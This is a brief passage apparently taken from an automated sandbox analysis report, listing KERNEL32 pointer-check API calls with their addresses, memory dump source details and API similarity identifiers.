                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 0285AD90
                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 0285ADC0
                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 0285ADDF
                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 0285ADEB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        Similarity
                        • API ID: Read$Write
                        • String ID:
                        • API String ID: 3448952669-0